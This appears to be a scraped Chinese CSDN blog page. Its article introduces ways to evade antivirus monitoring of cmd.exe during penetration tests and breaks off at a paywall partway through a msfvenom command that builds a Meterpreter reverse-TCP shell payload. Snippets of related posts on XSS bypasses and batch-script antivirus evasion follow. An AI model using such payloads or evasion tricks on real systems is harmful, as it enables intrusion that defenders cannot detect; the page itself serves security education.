bat执行有双引号的命令行_免杀技巧执行系统命令方式总结

最新推荐文章于 2023-05-26 18:19:11 发布
最新推荐文章于 2023-05-26 18:19:11 发布
阅读量695 收藏 2
点赞数
文章标签: bat执行有双引号的命令行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33917277/article/details/112118743
版权

“在渗透测试中,常常会遇到这种情况,上传一个shell上去,连上,却发现无法调用cmd.exe无法执行系统命令,这时候你往往想着,上传一个自己的cmd.exe上去,这是一套行云流水的操作,但把环境条件在变得苛刻一点,杀毒软件将监视二进制文件,例如cmd.exe,那么你会怎么做才能逃避检测?那么接下来就会介绍一些免杀思路。”

01

 背景 

Windows系统提供了多个二进制文件,可以使用它们执行任意命令。

在这,你是不是想到了什么?既然可以执行命令,那么它将帮助hacker们逃过检测,尤其是对cmd.exe监视的环境下。

当然这需要一些前提条件:未正确配置白名单规则(这里涵盖了文件名和路径),使得一些系统可执行文件能够执行。

接下来

让我们看看这些项免杀技术的闪光点!

df2df1b8c7fc686d73e1d660251d9e64.png

02

正文 

我们先用msfvenom生成一个木马程序:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.73.136 lport=
最低0.47元/天 解锁文章
管住你的嘴
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bat执行双引号命令行_一些BAT的XSS实例(二)进阶篇
weixin_35034536的博客
12-09 731
很多朋友私信我,想看XSS绕过实例分析,所以我选了10个BAT的XSS实例来聊聊构造和绕过思路。以下为10道题目(弹框1就算成功,大部分的题都是一题多解,尽量给出多种思路,或者最短的解法。)http://px1624.sinaapp.com/test/xsstest1/http://px1624.sinaapp.com/test/xsstest2/http://px1624.sinaap...
Linux-06-Linux基础总结及练习题
Hi文的博客
10-09 646
一、总结 二、练习题1 查看/etc/目录下所有文件及目录包括隐藏文件 ls /etc -la 在oldboy目录下进入根目录下的etc目录下的yum.repos.d目录 cd /etc/yum.repos.d/ 在家目录下创建一个名为oldboy的目录,然后进入该目录 cd ~ mkdir oldboy cd oldboy 在oldboy下创建一个名为student.txt的文件 touch student.txt 查看根目录下etc下passwd文件所有内容 c
linux 命令行 双引号,每天一个Linux命令之shell单引号和双引号的经典解释
weixin_29360387的博客
04-29 943
01 经典解释单引号:所见即所得双引号:所见非所得,它会先把变量解析之后,再输出反引号(``):命令替换,通常用于把命令输出结果传给入变量反斜杠( \ ):转义字符/逃脱字符,Linux如果echo要让转义字符发生作用,就要使用-e选项,且转义字符要使用双引号02 实例演示请先看下面这个例子:[root@dev2~] echo "$HOME"/root[root@dev2~] echo '$...
如何恢复edge浏览器旧版
Bourne___1的博客
10-31 6093
由于win10系统总是会总动更新,有些时候就会自动把win10自带的edge浏览器给更新了。旧版儿得edge浏览器用于看pdf非常的nice,如果更新了的话很多功能都会被修改了,本教程在于如何解决在已经更新了之后如何恢复到旧版本
bat如何处理参数的引号
白水冰泉的博客
04-14 4957
bat如何处理参数的引号bat如何处理参数的引号脚本语句 bat如何处理参数的引号 如果调用bat时 某一个参数包含空格,那么需要调用者将参数放在双引号,这时候就遇到一个问题,有些参数包含双引号,有些则没有,如何能够对这些参数进行统一的处理, 下面给出我常用的一段code。(如果参数本身就包含双引号,这段代码就失效了) 脚本语句 @ECHO off REM 读取第一个参数 SET...
bat执行问题
11-18
当你遇到"bat执行问题"时,可能涉及到多个方面,包括语法错误、权限问题、环境变量设置不正确、命令行参数的使用不当等。以下是一些关于解决bat执行问题的详细知识点: 1. **语法检查**:首先,确保批处理文件的...
通过BAT脚本检测并安装WINDOWS服务程序
03-27
在Windows操作系统,批处理(BAT)脚本是一种基于DOS命令行的自动化工具,用于执行一系列命令。本文将深入探讨如何使用BAT脚本来检测和安装Windows服务程序,以及涉及的相关知识点。 首先,我们需要理解什么是...
BAT批处理脚本-文本操作-字符串处理.zip
最新发布
12-26
在IT行业,批处理脚本是一种非常实用的自动化工具,特别是在Windows系统BAT(批处理)文件被广泛用于执行一系列命令行操作。本压缩包“BAT批处理脚本-文本操作-字符串处理.zip”专注于批处理脚本的字符串...
bat整理笔记
05-27
然而,根据提供的标题和描述,这里的"bat"似乎是指批处理(Batch)命令,它是Windows操作系统用于自动化执行一系列命令的一种脚本语言。批处理文件通常以.bat或.cmd为扩展名。下面,我们将深入探讨批处理文件的...
bat文件 字符串提取&替换等操作
05-31
在IT领域,批处理文件(BAT文件)是基于DOS或Windows操作系统的一种脚本文件,主要用于自动化执行一连串命令。这些文件通常包含DOS命令行指令,可以帮助用户完成一系列重复性的任务,如字符串的提取和替换。在本文...
bat 脚本参数
LLJ_DS的博客
05-26 1945
等由数字代表的形式进行引用,如果要在BAT脚本引用包含特殊字符的参数,请将其包含在双引号BAT脚本的参数用。
bat 命令返回结果_优秀的命令行工具整理 (一)
weixin_39542608的博客
11-22 354
原文作者: Darren Burns 翻译:weakish@LeanCloud 原文链接:Power Up Your Command Line我打算写一系列文章,展示下近些年发现的一些很棒的非标准命令行工具,这是第一篇。如果你用命令行,那么这些工具大概至少有一个能让你的生活更舒心。z 跳转现代浏览器地址栏可以智能模糊搜索,节省了大量时间。想要刷下推特?只需在地址栏输入「tw」然后回车。相比之下...
bat 引号 嵌套_bat脚本常用命令
weixin_40001924的博客
11-22 1072
意气风发啊骑上我快乐的小摩托良心公众号啊!我上墙了你开始了嚯嚯嚯嚯嚯哈哈哈哈哈皮皮虾我们走可乐在厨房 红牛在冰箱6666666看弹幕,点关注"我相信这不是我一个人的经历:傍晚时分,你坐在屋檐下,看着天慢慢地黑下去,心里寂寞而凄凉,感到自己的生命被剥夺了。当时我是个年轻人,但我害怕这样生活下去,衰老下去。在我看来,这是比死亡更可怕的事。——《沉默的大多数》"title: bat脚本常用命令...
Bat 语法
weixin_38308549的博客
08-15 6029
不区分大小写 bat的单引号:执行单引号的命令,相当于shell里面的反引号 bat双引号:引用的内容,如字符串 echo 输入语句如果带有单引号(不会执行命令)或者双引号时,会打印显示出该符号 传参:%0-%9 例如:start haha.bat “huahua” “jaja” %0:haha.bat %1:huahua %2:jaja @:不显示@后面的命令 echo off:不显示...
DOS批处理高级教程:第一章 批处理基础
weixin_34050427的博客
09-24 217
第一节 常用批处理内部命令简介 批处理定义:顾名思义,批处理文件是将一系列命令按一定的顺序集合为一个可执行的文本文件,其扩展名为BAT或者CMD。这些命令统称批处理命令。 小知识:可以在键盘上按下Ctrl+C组合键来强行终止一个批处理的执行过程。 了解了大概意思后,我们正式开始学习.先看一个简单的例子! @echo off ...
批处理加密,免杀方法总结 【转】
小菜蝶 .net DotNet
10-26 1526
批处理加密方法总结 1.编写能在LINUX与WINDOWS同时运行的BAT脚本 2.批处理脚本的加密解密 3.加入欺骗代码 (病毒代码测试)4.代码插入圾伪代码 5.BAT的免查杀 6.综合利用 1:编写能在LINUX与WINDOWS同时运行的BAT脚本 为什么能编写出这样的脚本? 因为BAT有一个特性,他会忽略一些简单的错误,(也就是错误的命令他只会返回一个错误信息,并不 退出BAT脚本,而是会执行下一个命令,直到全部命令执行完毕,不管对错!) 利用个特性我们就可以在脚本前面写上LINUX的shell脚
Windows bat命令入门与高级技巧详解:自动化解决方案
本文档深入探讨了Windows批处理命令的基础知识以及高级技巧,旨在帮助用户在Windows操作系统自动化和简化手动操作。主要内容包括以下几个部分: 1. **批处理基础**: - **常用内部命令**:介绍了REM和::用于注释...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值